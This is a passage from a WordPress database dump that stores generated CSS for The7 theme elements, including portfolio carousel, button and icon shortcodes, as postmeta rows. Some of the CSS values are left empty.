;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap *,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:before,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n  background: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n  background: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-title,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap,\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: *2;\r\n  grid-column-gap: *2;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: ;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: *2;\r\n  grid-row-gap: *2;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n  margin: -;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 100%/;\r\n  padding: ;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(100%/) * 2;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: *2 - 30px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%/;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%/)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%/;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%/)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%/;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%/)*2;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a {\r\n  width: 36px;\r\n  height: 36px;\r\n  border-radius: 500px;\r\n}\r\n.dt-arrow-border-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:not(:hover):before {\r\n  border-width: 0px;\r\n}\r\n.dt-arrow-hover-border-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:hover:after {\r\n  border-width: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-prev {\r\n  top: 50%;\r\n  transform: translateY(calc(-50% + 0px));\r\n  left: -43px;\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-prev {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-prev i {\r\n  padding: 0px 0px 0px 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-next {\r\n  top: 50%;\r\n  transform: translateY(calc(-50% + 0px));\r\n  right: -43px;\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-next {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-next i {\r\n  padding: 0px 0px 0px 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav i {\r\n  font-size: 32px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:not(:hover) i,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:not(:hover) i:before {\r\n  color: rgba(0,0,0,0.15);\r\n  background: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n  top: calc(100% + 20px);\r\n  left: 50%;\r\n  transform: translateX(calc(-50% + 0px));\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n    transform: translateX(-50%);\r\n    margin-left: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot {\r\n  width: 10px;\r\n  height: 10px;\r\n  margin: 0 8px;\r\n}\r\n.bullets-ubax.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot.active span {\r\n  border-color: ;\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.hide-arrows .owl-nav a {\r\n    display: none;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    left: 10px;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    right: 10px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n  top: calc(100% + 20px);\r\n  left: 50%;\r\n  transform: translateX(calc(-50% + 0px));\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n    transform: translateX(-50%);\r\n    margin-left: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot {\r\n  width: 10px;\r\n  height: 10px;\r\n  margin: 0 8px;\r\n}\r\n.bullets-ubax.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot.active span {\r\n  border-color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.enable-img-shadow .owl-stage-outer {\r\n  padding: 34px 0;\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.hide-arrows .owl-nav a {\r\n    display: none;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    left: 10px;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    right: 10px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n'),
(19740,3063,'_dt_mobile_page_padding_top','0px'),
(19741,3063,'_dt_mobile_page_padding_bottom','0px'),
(19742,3063,'the7_fancy_title_css','#main {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n@media screen and (max-width: 778px) {\n  #main {\n    padding-top: 0px;\n    padding-bottom: 0px;\n  }\n}\n'),
(19743,3063,'the7_shortcodes_dynamic_css','a:3:{s:32:\"9257017e3164acfe496e3c83a6227e7a\";s:185:\"#default-btn-9257017e3164acfe496e3c83a6227e7a.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-9257017e3164acfe496e3c83a6227e7a > i {\n  margin-right: 8px;\n}\n\";s:32:\"6d8ead28084f2f7cc7e24255d8bfbd9e\";s:185:\"#default-btn-6d8ead28084f2f7cc7e24255d8bfbd9e.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-6d8ead28084f2f7cc7e24255d8bfbd9e > i {\n  margin-right: 8px;\n}\n\";s:32:\"d90d528f09bfcbe57894150915174d20\";s:5761:\".icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon {\n  width: 60px;\n  height: 60px;\n  line-height: 60px;\n  font-size: 32px;\n  border-radius: 200px;\n  margin: 0px 0px 0px 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner {\n  min-width: 60px;\n  min-height: 60px;\n  border-radius: 200px;\n}\n@media all and (-ms-high-contrast: none) {\n  .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner {\n    height: 60px;\n  }\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .dt-hover-icon {\n  line-height: 60px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon:before,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon:after,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner:before,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner:after {\n  min-width: 100%;\n  min-height: 100%;\n  padding: inherit;\n  border-radius: inherit;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-width: 2px;\n  border-style: solid;\n}\n.dt-icon-border-dashed.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.dt-icon-border-dotted.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.dt-icon-border-double.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dashed.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dotted.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-double.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-border-on:after {\n  border-width: 2px;\n  border-style: solid;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dashed.dt-icon-hover-border-on:after {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dotted.dt-icon-hover-border-on:after {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-double.dt-icon-hover-border-on:after {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover {\n  font-size: 32px;\n}\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-icon {\n  color: #fff;\n  background: none;\n}\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 